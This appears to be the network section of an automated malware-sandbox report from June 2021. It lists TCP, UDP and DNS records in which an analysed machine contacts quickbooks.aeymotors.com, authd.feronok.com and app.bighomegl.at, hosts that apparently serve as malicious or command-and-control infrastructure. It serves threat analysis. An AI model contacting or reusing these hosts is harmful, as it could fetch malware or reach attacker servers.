                                                                                                                                                                Jun 11, 2021 05:06:42.411695957 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.411740065 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.411755085 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.411797047 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.411811113 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.411847115 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.411864042 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.411902905 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.411916971 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.411955118 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.411968946 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.412005901 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.412023067 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.412054062 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.412054062 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.412107944 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.412122965 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.412172079 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.412555933 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.412606955 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.412615061 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.412689924 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.412708998 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.412745953 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.412832975 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.412899017 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.412899017 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.412972927 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.412990093 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.413038015 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.413053036 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.413079977 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.413108110 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.413136005 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.413172007 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.413209915 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.413229942 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.413258076 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.413271904 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.413311958 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.413386106 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.413446903 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.413455963 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.413501978 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.413516998 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.413557053 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.413574934 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.413629055 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414056063 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.414109945 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.414130926 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414191008 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414207935 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.414252043 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.414272070 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414288998 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.414315939 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414324999 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.414341927 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414378881 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414454937 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.414537907 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.414551020 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414613008 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.414663076 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414684057 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414922953 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.414974928 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.414988041 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415044069 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.415055990 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415107965 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.415184021 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415240049 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.415544987 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415604115 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.415678024 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415735006 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.415873051 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415936947 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.415950060 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.415992975 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.416003942 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.416049957 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.416162014 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.416212082 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.416233063 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.416254997 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.416269064 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.416292906 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.416307926 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.416332006 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.416346073 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.416380882 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.423525095 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:42.611542940 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:35.184505939 CEST4973180192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.184837103 CEST4973280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.229610920 CEST8049731185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:35.229652882 CEST8049732185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:35.229734898 CEST4973180192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.229762077 CEST4973280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.230685949 CEST4973280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.314006090 CEST8049732185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:35.765377045 CEST8049732185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:35.769656897 CEST4973280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.775603056 CEST4973280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:07:35.820647955 CEST8049732185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:36.961333990 CEST4973180192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:18.730082035 CEST4974280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:18.730422020 CEST4974380192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:18.773056984 CEST8049742185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:18.773088932 CEST8049743185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:18.773416996 CEST4974280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:18.773689032 CEST4974380192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:18.773828030 CEST4974280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:18.861906052 CEST8049742185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:19.317267895 CEST8049742185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:19.317461967 CEST4974280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:19.318624973 CEST4974280192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:19.361713886 CEST8049742185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:20.414458036 CEST4974380192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.234323025 CEST4974780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.234350920 CEST4974680192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.279032946 CEST8049746185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:42.279068947 CEST8049747185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:42.279211044 CEST4974680192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.281949997 CEST4974780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.281996965 CEST4974680192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.367542982 CEST8049746185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:42.816906929 CEST8049746185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:42.817101002 CEST4974680192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.818253040 CEST4974680192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:08:42.860840082 CEST8049746185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:43.813780069 CEST4974780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:05.471008062 CEST4974880192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:05.471015930 CEST4974980192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:05.514266014 CEST8049749185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:05.514318943 CEST8049748185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:05.514436960 CEST4974980192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:05.514646053 CEST4974880192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:05.515579939 CEST4974980192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:05.605885029 CEST8049749185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:06.066171885 CEST8049749185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:06.067698002 CEST4974980192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:06.068443060 CEST4974980192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:06.111268044 CEST8049749185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:07.165457010 CEST4974880192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:27.552340984 CEST4975780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:27.595210075 CEST8049757185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:27.595318079 CEST4975780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:27.597299099 CEST4975780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:27.681840897 CEST8049757185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:28.119246960 CEST8049757185.233.80.31192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:28.123477936 CEST4975780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:28.243069887 CEST4975780192.168.2.3185.233.80.31
                                                                                                                                                                Jun 11, 2021 05:09:28.286056995 CEST8049757185.233.80.31192.168.2.3

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Jun 11, 2021 05:06:25.862030029 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:25.915081024 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:28.255824089 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:28.305999041 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:29.182934999 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:29.233422041 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:30.482783079 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:30.541830063 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:34.067416906 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:34.120815992 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:36.434911013 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:36.485276937 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:37.407885075 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:37.499209881 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:37.981336117 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:38.058485031 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:39.002623081 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:39.084441900 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:39.988941908 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:40.042346954 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.064790010 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:40.128721952 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.380889893 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:40.458628893 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.907951117 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:40.959018946 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.065156937 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:42.129344940 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.249439955 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:42.300431967 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:43.403639078 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:43.464952946 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:44.416743994 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:44.468770027 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:45.750783920 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:45.801269054 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:46.164518118 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:46.226581097 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:49.635577917 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:49.688374996 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:50.769392967 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:50.819897890 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:51.997167110 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:52.047645092 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:53.898849010 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:53.960830927 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:55.046935081 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:55.097850084 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:03.387378931 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:03.465854883 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:18.991520882 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:19.060156107 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:20.711811066 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:20.772805929 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:33.445947886 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:33.507005930 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:34.860609055 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:35.167087078 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:38.480021000 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:38.557385921 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:55.667896986 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:55.739806890 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:56.073646069 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:56.135864973 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:02.938903093 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:02.999589920 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:03.457042933 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:03.510123968 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:04.462721109 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:04.516174078 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:05.510835886 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:05.565514088 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:07.556732893 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:07.610285997 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:11.559844017 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:11.613286018 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:17.462878942 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:17.533377886 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:18.654154062 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:18.715344906 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:31.837861061 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:31.902117014 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:33.055109024 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:33.117408037 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:40.841224909 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:40.902344942 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:41.880603075 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:42.207499027 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:04.297646046 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:04.359671116 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:05.394586086 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:05.453524113 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:22.840785027 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:22.902755976 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:23.724342108 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:23.783349037 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:24.407283068 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:24.468305111 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:25.002146959 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:25.064754963 CEST53568038.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:25.857040882 CEST5714553192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:25.918283939 CEST53571458.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:26.525887966 CEST5535953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:26.584979057 CEST53553598.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:27.241287947 CEST5830653192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:27.302783012 CEST53583068.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:27.481347084 CEST6412453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:27.540366888 CEST53641248.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:28.488085032 CEST4936153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:28.547096014 CEST53493618.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:30.059524059 CEST6315053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:30.118799925 CEST53631508.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:30.536664963 CEST5327953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:30.589927912 CEST53532798.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:48.266587973 CEST5688153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:48.331005096 CEST53568818.8.8.8192.168.2.3

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                Jun 11, 2021 05:06:40.380889893 CEST192.168.2.38.8.8.80xe084Standard query (0)quickbooks.aeymotors.comA (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:07:34.860609055 CEST192.168.2.38.8.8.80x1580Standard query (0)authd.feronok.comA (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:08:18.654154062 CEST192.168.2.38.8.8.80xd547Standard query (0)authd.feronok.comA (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:08:41.880603075 CEST192.168.2.38.8.8.80xd78bStandard query (0)app.bighomegl.atA (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:09:05.394586086 CEST192.168.2.38.8.8.80xdfd3Standard query (0)authd.feronok.comA (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:09:27.481347084 CEST192.168.2.38.8.8.80xe8d0Standard query (0)app.bighomegl.atA (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:09:48.266587973 CEST192.168.2.38.8.8.80xb1cdStandard query (0)authd.feronok.comA (IP address)IN (0x0001)

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                Jun 11, 2021 05:06:40.458628893 CEST8.8.8.8192.168.2.30xe084No error (0)quickbooks.aeymotors.com50.87.220.158A (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:07:35.167087078 CEST8.8.8.8192.168.2.30x1580No error (0)authd.feronok.com185.233.80.31A (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:07:55.739806890 CEST8.8.8.8192.168.2.30xba06No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:08:18.715344906 CEST8.8.8.8192.168.2.30xd547No error (0)authd.feronok.com185.233.80.31A (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:08:42.207499027 CEST8.8.8.8192.168.2.30xd78bNo error (0)app.bighomegl.at185.233.80.31A (IP address)IN (0x0001)
